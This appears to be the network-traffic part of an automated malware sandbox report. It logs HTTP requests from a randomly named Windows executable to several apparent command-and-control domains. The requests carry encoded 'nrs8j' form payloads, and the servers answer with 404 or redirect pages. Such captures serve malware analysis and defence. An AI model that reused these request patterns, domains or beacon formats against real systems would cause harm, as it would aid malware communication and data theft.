                                                                  Data Ascii: nrs8j=GpUo6a1xop2t70Lgcvw4W8OsxCXqO/MUSlQ9PDZKNaVC9Oxx36I/b0hWQpUtRRg+GOWZVVgxL1Yf6ETmWuAFaSVoRs5MDZWAjSe+/TpC4itEDH5U+SfhyQ6/+Gy39Koy2Q4i0UHbr34oCuEVxN7Ozh2qKFYVAMqnpOnqnNRzBs3V5OGjHi1yh9jDtI5Ry5hnmSkh6erwYAZFb44N0dwNQfr+ErltpwFBACAzsKCLsMtfbPypNH1whkHsUbiG9wNAY9M4T6rLGpwF2mE6EqBdq/qUz+UKCTcT4PqNuED4eS26iTBQBi2ePhG8glCBPKS0jB7ulnJ0BXbtBcvVfJXVX4Cbg2jE+Mhnp/ItZkzCMdTuMl5PbBX8rdMr3+rHreA1XBXjR7PPz1rPtZpIlShajlIQNsX6ew63GIQnX1366bCD/akDLbGS1MQpc98EUZJgwa8bCRH3B1ygQIAjDbjrbN+NDPnG3lgJZQW+6P9g6rQtXzCh6t6aX80R8Z1VsGqZ2eDg9A9nwcRg0xh3Jf0DOUEo99E7+6K3Se/VXp5ZJMHWfUM9ZQcvPaBFHkVE+Ob8hxrX5dDKDOKtiJKm45hEBdtJbK7BqUfLWy2aET7kbB9ct0S5VTFtVp6KZEXJIn5sFt0H5TWb1VM3goSqxd1kIhnf7uvbIeyG9q9P1GntmIEq3bqdk9gEnvAB0QIS3jUxf5yZ0njcp8cpbFEwiqIc6Mm0KEAS5UX2X+2WQbjmv6zOXwjTqxILs/Ut9MwB5//oUjTMmzbNYPBoPahaciTGZ+Sesw791Au7P71p9SDkJCf6e0v6xKZ0jnRLy8hQd4esJNBiXYFy0WsB6o/MV4PhHrH+QqxVx9Gi/vsDufiKP5QmsecPc5T4Kr5xg2BbrZvHFzWDiSekXQFoxQI918XT/wSBTCcfN8dUqi15dnx4tV1+Z1gI2dTPgtKO4Ynk1sakoBpIycTOr04eUwrHqLoc6yalKp1K1esL+1Sh5c2LS0oYMT [TRUNCATED]
                                                                  Oct 8, 2024 14:19:18.706728935 CEST980INHTTP/1.1 404 Not Found
                                                                  Date: Tue, 08 Oct 2024 12:19:18 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 774
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.450011199.192.21.169801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:20.659512997 CEST442OUTGET /6iok/?Yp=eXMH4fkp&nrs8j=Lr8I5vR8kZnO1BXwYoMTGZrf0zW9P9gXQAsQehgeDaNdyJVo64QKCUs+Z9VbQDUfL8+SUHVZNFYLvGD3PrMcSw81RdJBHrPngUHAq0ps+A4FRAxn/QrS6wg= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.cenfresh.life
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Oct 8, 2024 14:19:21.278870106 CEST995INHTTP/1.1 404 Not Found
                                                                  Date: Tue, 08 Oct 2024 12:19:21 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 774
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.4500123.33.130.190801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:34.403327942 CEST724OUTPOST /paa2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.digitalbloom.info
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.digitalbloom.info
                                                                  Referer: http://www.digitalbloom.info/paa2/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 6e 42 70 54 63 48 49 73 34 6e 51 68 4b 2b 30 4e 63 45 48 36 46 63 68 6a 74 75 72 30 69 64 6d 57 66 45 4a 63 79 6d 46 49 6f 4e 53 32 66 76 70 75 6e 78 46 56 44 4e 59 72 6e 6c 38 4f 6f 30 5a 52 66 76 31 59 57 31 6a 2f 75 31 36 58 53 4b 45 4e 42 41 4e 53 52 59 33 75 37 4c 76 37 72 48 32 72 4e 4a 63 38 44 6c 78 38 36 39 67 73 71 44 31 38 65 49 38 51 35 34 5a 44 54 4f 61 5a 43 38 7a 6b 37 58 65 64 73 6e 58 73 7a 42 49 54 31 34 58 61 59 4b 31 65 34 2f 56 42 6e 5a 37 51 37 43 36 54 6b 6a 72 72 44 45 4b 6c 6a 70 4b 4d 4a 64 2f 52 73 65 42 50 78 48 49 64 75 59 37 62 39 2f 64 74 42 51 3d 3d
                                                                  Data Ascii: nrs8j=nBpTcHIs4nQhK+0NcEH6Fchjtur0idmWfEJcymFIoNS2fvpunxFVDNYrnl8Oo0ZRfv1YW1j/u16XSKENBANSRY3u7Lv7rH2rNJc8Dlx869gsqD18eI8Q54ZDTOaZC8zk7XedsnXszBIT14XaYK1e4/VBnZ7Q7C6TkjrrDEKljpKMJd/RseBPxHIduY7b9/dtBQ==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.4500133.33.130.190801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:36.946455002 CEST744OUTPOST /paa2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.digitalbloom.info
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.digitalbloom.info
                                                                  Referer: http://www.digitalbloom.info/paa2/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 6e 42 70 54 63 48 49 73 34 6e 51 68 4c 66 45 4e 50 6e 66 36 4f 63 68 67 75 75 72 30 6f 39 6d 53 66 45 56 63 79 6d 74 69 76 2b 6d 32 65 4c 68 75 6d 77 46 56 41 4e 59 72 76 46 38 4c 69 55 5a 4b 66 76 34 74 57 31 76 2f 75 31 75 58 53 4c 30 4e 55 6a 6c 64 51 49 33 67 76 37 76 31 68 6e 32 72 4e 4a 63 38 44 6c 56 57 36 38 49 73 74 7a 6c 38 66 70 38 54 36 34 5a 41 61 75 61 5a 52 73 7a 67 37 58 65 72 73 6d 62 57 7a 43 77 54 31 36 66 61 66 59 4e 5a 32 2f 56 48 34 70 36 6e 31 79 2b 62 71 53 43 44 4b 6c 4b 48 6b 49 71 2f 46 37 75 4c 39 76 67 59 6a 48 73 75 7a 66 79 76 77 38 67 6b 61 54 74 37 4c 62 37 34 4c 6c 51 5a 34 48 74 64 6e 47 48 75 75 37 6b 3d
                                                                  Data Ascii: nrs8j=nBpTcHIs4nQhLfENPnf6Ochguur0o9mSfEVcymtiv+m2eLhumwFVANYrvF8LiUZKfv4tW1v/u1uXSL0NUjldQI3gv7v1hn2rNJc8DlVW68Istzl8fp8T64ZAauaZRszg7XersmbWzCwT16fafYNZ2/VH4p6n1y+bqSCDKlKHkIq/F7uL9vgYjHsuzfyvw8gkaTt7Lb74LlQZ4HtdnGHuu7k=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.4500143.33.130.190801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:39.495529890 CEST10826OUTPOST /paa2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.digitalbloom.info
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.digitalbloom.info
                                                                  Referer: http://www.digitalbloom.info/paa2/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 6e 42 70 54 63 48 49 73 34 6e 51 68 4c 66 45 4e 50 6e 66 36 4f 63 68 67 75 75 72 30 6f 39 6d 53 66 45 56 63 79 6d 74 69 76 2b 2b 32 65 35 35 75 6e 54 74 56 42 4e 59 72 68 6c 38 4b 69 55 59 61 66 76 67 68 57 31 53 4b 75 33 57 58 54 74 49 4e 51 69 6c 64 65 49 33 67 77 72 76 30 72 48 33 68 4e 4a 4d 67 44 6c 6c 57 36 38 49 73 74 31 4a 38 59 34 38 54 38 34 5a 44 54 4f 61 64 43 38 7a 49 37 58 47 56 73 6d 66 47 7a 7a 51 54 30 5a 33 61 5a 74 5a 5a 36 2f 56 46 35 70 36 2f 31 7a 44 46 71 53 65 68 4b 6c 2b 39 6b 49 65 2f 56 39 6e 4a 35 73 6b 79 31 42 34 45 6d 64 71 4f 70 4f 31 6e 53 69 35 54 50 35 44 77 55 6d 49 6f 7a 6e 4d 68 6a 33 43 72 31 75 31 55 7a 36 52 39 4a 37 58 33 6c 6d 73 76 64 54 47 6b 72 6a 6e 4f 52 61 78 68 68 62 6b 53 30 6b 6f 31 73 32 4c 36 63 6d 5a 6a 6d 4f 2f 69 6d 57 4f 4a 66 6a 57 52 2f 4e 69 55 6a 76 79 52 71 30 6f 75 70 47 37 78 6c 2b 55 49 30 44 4b 55 64 61 6d 49 71 59 67 70 2f 73 58 47 39 75 2b 4b 36 59 32 35 66 50 35 44 72 38 35 51 58 71 7a 51 52 54 6b 58 31 43 42 34 [TRUNCATED]
                                                                  Data Ascii: nrs8j=nBpTcHIs4nQhLfENPnf6Ochguur0o9mSfEVcymtiv++2e55unTtVBNYrhl8KiUYafvghW1SKu3WXTtINQildeI3gwrv0rH3hNJMgDllW68Ist1J8Y48T84ZDTOadC8zI7XGVsmfGzzQT0Z3aZtZZ6/VF5p6/1zDFqSehKl+9kIe/V9nJ5sky1B4EmdqOpO1nSi5TP5DwUmIoznMhj3Cr1u1Uz6R9J7X3lmsvdTGkrjnORaxhhbkS0ko1s2L6cmZjmO/imWOJfjWR/NiUjvyRq0oupG7xl+UI0DKUdamIqYgp/sXG9u+K6Y25fP5Dr85QXqzQRTkX1CB4DqZMjIY4HCzvpWDLEcvhjaleN9ZfutnyVL/HFBN+irT1ZtjfgEwB0iQdwpttxV9coqrIltETLdw2hIvjw86nkoaC/yp0kLHAfpTrXViJyH4CMYFbMBRc8XFQPAdkajx+lIW2QjpTlQkotaRHv2Vd/uy/8wulChxYCvsA0+dPjJa31Oy84df9cDbZW1xNbwnagR61DaVBpFNdR+5gjgjbbtQcTZToI8yV1NpgoNAIxY6wTIDKNMJ7tYLLzxaecw+YhtQLhwXTMRBH6brZyA9fxpZAj20NGXNFof0btUEjD01aU4AF+Ba5nndfXZlbUIgqvo9kDj17a4CNv/eiUUf4tEEk74E0Ov6QNcEXcSDszcwF827+oxoeNNfABc8TP1rarBEzY92iRO3VL6W5Y866OVzXiLHdZ92DvLl+S24iR72fqcS27RBKvL+9Uy5rQSKXnDJrkBFavYkbJYG6qUcb+v5xf/Eo2zxrCsGMmVq8DAuYNOK385Kafes5ekyG9VHOxWlMALOL+2valOwbUEvUqCWBMFbUID5GUT6DJDcQ/EpmZZ71sTEoJABYnX74e5UivMqDyzsuNy8JIKaL5JAHK2YgT0FjuGAYNVBI2aWxbo4Mp+v0+yesKOeqySqK6Ks6VpgeUmNziMLj1Aj47WJB+c72IHWGmVdGxn [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.4500153.33.130.190801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:42.037537098 CEST446OUTGET /paa2/?Yp=eXMH4fkp&nrs8j=qDBzf3Em8FMnDuZYbVfiL5sknZWYhueoT0F4r09hh9DCbJoHqCNNB+hYoG1Us3VrdNJQeWmKv3CCTbgwH3NiU5qDwpXvlmSTPuYmawVAsPwUoUwLb74j9YI= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.digitalbloom.info
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Oct 8, 2024 14:19:43.465883017 CEST393INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Tue, 08 Oct 2024 12:19:43 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 253
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 70 3d 65 58 4d 48 34 66 6b 70 26 6e 72 73 38 6a 3d 71 44 42 7a 66 33 45 6d 38 46 4d 6e 44 75 5a 59 62 56 66 69 4c 35 73 6b 6e 5a 57 59 68 75 65 6f 54 30 46 34 72 30 39 68 68 39 44 43 62 4a 6f 48 71 43 4e 4e 42 2b 68 59 6f 47 31 55 73 33 56 72 64 4e 4a 51 65 57 6d 4b 76 33 43 43 54 62 67 77 48 33 4e 69 55 35 71 44 77 70 58 76 6c 6d 53 54 50 75 59 6d 61 77 56 41 73 50 77 55 6f 55 77 4c 62 37 34 6a 39 59 49 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yp=eXMH4fkp&nrs8j=qDBzf3Em8FMnDuZYbVfiL5sknZWYhueoT0F4r09hh9DCbJoHqCNNB+hYoG1Us3VrdNJQeWmKv3CCTbgwH3NiU5qDwpXvlmSTPuYmawVAsPwUoUwLb74j9YI="}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.45001684.32.84.32801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:48.545311928 CEST724OUTPOST /pt4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.thepeatear.online
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.thepeatear.online
                                                                  Referer: http://www.thepeatear.online/pt4m/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 4e 78 69 7a 64 4c 6b 6f 38 66 54 37 41 45 46 65 66 66 5a 55 58 33 79 69 62 39 4f 4f 6a 31 6c 4e 71 61 31 37 4f 34 74 33 48 54 5a 34 61 33 72 7a 37 66 78 54 67 57 44 5a 4f 65 55 47 77 31 45 56 41 6c 5a 64 76 31 4f 46 51 4b 47 50 72 38 68 63 78 2f 31 47 71 61 33 47 70 36 67 52 58 6f 31 6b 55 68 61 66 69 73 6f 4f 64 69 4d 71 68 58 58 78 6b 2f 2b 77 62 38 47 50 62 4c 6b 79 39 69 50 55 79 64 72 58 72 52 5a 41 74 57 73 50 47 51 74 77 41 38 53 45 51 39 71 56 58 2f 67 4a 71 77 38 48 37 58 39 4b 44 7a 42 4c 54 53 78 54 53 76 50 41 41 43 34 6c 58 4e 65 70 70 5a 66 57 48 35 6e 55 5a 77 3d 3d
                                                                  Data Ascii: nrs8j=NxizdLko8fT7AEFeffZUX3yib9OOj1lNqa17O4t3HTZ4a3rz7fxTgWDZOeUGw1EVAlZdv1OFQKGPr8hcx/1Gqa3Gp6gRXo1kUhafisoOdiMqhXXxk/+wb8GPbLky9iPUydrXrRZAtWsPGQtwA8SEQ9qVX/gJqw8H7X9KDzBLTSxTSvPAAC4lXNeppZfWH5nUZw==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.45001784.32.84.32801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:51.084002972 CEST744OUTPOST /pt4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.thepeatear.online
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.thepeatear.online
                                                                  Referer: http://www.thepeatear.online/pt4m/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 4e 78 69 7a 64 4c 6b 6f 38 66 54 37 41 6b 31 65 64 34 31 55 66 33 79 74 56 64 4f 4f 31 46 6c 52 71 61 70 37 4f 35 59 73 48 68 39 34 61 53 58 7a 36 64 4a 54 73 32 44 5a 46 2b 55 44 2b 56 45 4f 41 6c 56 56 76 30 65 46 51 4a 36 50 72 35 4e 63 77 4f 31 46 72 4b 33 49 38 71 67 58 59 49 31 6b 55 68 61 66 69 73 38 6f 64 69 55 71 67 6e 6e 78 32 75 2b 2f 61 38 47 51 63 4c 6b 79 76 53 50 59 79 64 72 35 72 51 46 71 74 51 6f 50 47 56 4a 77 4f 4e 53 48 48 4e 71 58 49 76 68 49 36 41 42 49 2f 56 34 5a 48 79 35 70 64 78 6c 38 61 4a 65 61 52 7a 5a 79 46 4e 36 61 30 65 57 69 4b 36 61 64 43 34 36 6e 41 45 4a 55 36 38 50 36 43 69 49 6e 46 32 67 48 35 53 73 3d
                                                                  Data Ascii: nrs8j=NxizdLko8fT7Ak1ed41Uf3ytVdOO1FlRqap7O5YsHh94aSXz6dJTs2DZF+UD+VEOAlVVv0eFQJ6Pr5NcwO1FrK3I8qgXYI1kUhafis8odiUqgnnx2u+/a8GQcLkyvSPYydr5rQFqtQoPGVJwONSHHNqXIvhI6ABI/V4ZHy5pdxl8aJeaRzZyFN6a0eWiK6adC46nAEJU68P6CiInF2gH5Ss=


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  15192.168.2.45001884.32.84.3280
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:53.639532089 CEST10826OUTPOST /pt4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.thepeatear.online
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.thepeatear.online
                                                                  Referer: http://www.thepeatear.online/pt4m/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 4e 78 69 7a 64 4c 6b 6f 38 66 54 37 41 6b 31 65 64 34 31 55 66 33 79 74 56 64 4f 4f 31 46 6c 52 71 61 70 37 4f 35 59 73 48 68 31 34 5a 67 76 7a 37 38 4a 54 74 32 44 5a 47 2b 55 43 2b 56 46 63 41 6c 64 52 76 30 53 56 51 4d 2b 50 72 66 5a 63 34 63 64 46 6c 4b 33 49 2b 71 67 53 58 6f 31 78 55 6c 47 44 69 76 45 6f 64 69 55 71 67 6c 50 78 6d 50 2b 2f 58 63 47 50 62 4c 6c 39 39 69 4f 46 79 63 44 50 72 51 42 51 74 6a 67 50 47 31 35 77 44 66 4b 48 62 64 71 5a 4c 76 67 62 36 41 4d 49 2f 56 6b 56 48 79 64 54 64 77 64 38 59 39 54 54 45 68 6c 66 59 2f 58 44 6d 2f 37 45 45 59 65 69 4f 4a 32 37 49 6b 45 4d 71 4a 76 71 4e 6a 74 59 5a 6b 5a 46 6a 79 47 6f 4a 6a 78 6f 69 51 44 61 74 49 78 30 42 6c 74 70 36 71 67 47 45 68 4c 33 51 52 70 77 55 46 36 34 43 48 52 53 77 61 57 45 59 79 4f 6c 42 58 49 66 56 66 69 6b 36 47 79 6a 34 61 68 38 4e 62 77 4f 37 63 2f 52 63 6b 51 6b 5a 6f 30 67 6f 34 4a 4d 76 47 79 4d 34 56 45 6f 59 30 49 2f 30 55 30 75 69 4a 6d 41 67 6e 59 78 43 48 37 55 41 67 34 4b 55 51 30 52 [TRUNCATED]
                                                                  Data Ascii: nrs8j=NxizdLko8fT7Ak1ed41Uf3ytVdOO1FlRqap7O5YsHh14Zgvz78JTt2DZG+UC+VFcAldRv0SVQM+PrfZc4cdFlK3I+qgSXo1xUlGDivEodiUqglPxmP+/XcGPbLl99iOFycDPrQBQtjgPG15wDfKHbdqZLvgb6AMI/VkVHydTdwd8Y9TTEhlfY/XDm/7EEYeiOJ27IkEMqJvqNjtYZkZFjyGoJjxoiQDatIx0Bltp6qgGEhL3QRpwUF64CHRSwaWEYyOlBXIfVfik6Gyj4ah8NbwO7c/RckQkZo0go4JMvGyM4VEoY0I/0U0uiJmAgnYxCH7UAg4KUQ0RyXeUl6M8O5zLA4DOGmYzmnGgjW8xiln4hZKpoZgf4hKR0bz5SdTOX4kTXZ15NRFNJQw4SKqQQb53M/oVKPXonOHmqV2zrlsHYQ4vv/KE115b7/nFZK1v95KBa5v5K5SWFoBT/nhamTgjd/KIlQr6KnaYgoOjhKwxF4E5UXRjgSAcFbYPuuo8LEbT1TUCwePoOzCbigKjMCC3eWocYyeUG20EN73Bl1V0lbXl4Mn7JLjwRbchWMxUHmP17kiovhLVDyglwTvdUocQVDxeYuFAeMkp0j8lh0Cok0ci6ZhfiORvzC4SX/zXjd7e2XP9N4ohdvyCDFbgtqllFYDQ+fGHf/u8y+pTlkcJz8gfTq4MY0ZkhvZHNnNGEjRwOtLYvwUI+QMlN4AILvRAbVqD8v0Zal3gva0F8xYZH794xWbOHdoW6GGk+8ygeOm+PwPTDn0aRtXyi00POVAenE499gbdytGHL5IlVPtlPw8m+49z9E9/B7Ch/xR/+U4d4CH6UVuRa/UJ4rMj+tf6pVMQeXXLgpsFUr7kKd7IASZuI+Cu06v9dgLZbEZ3ooCemdQxG5gO21JSGbpy22rq1BbDZU+BikIV0LgQ4h9XkhcDVvu0jxA+Eb7aDmUejI0ljNWK6JxoxM+fmKP3SrllOufBOBRffrquygTKKwcyYq [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
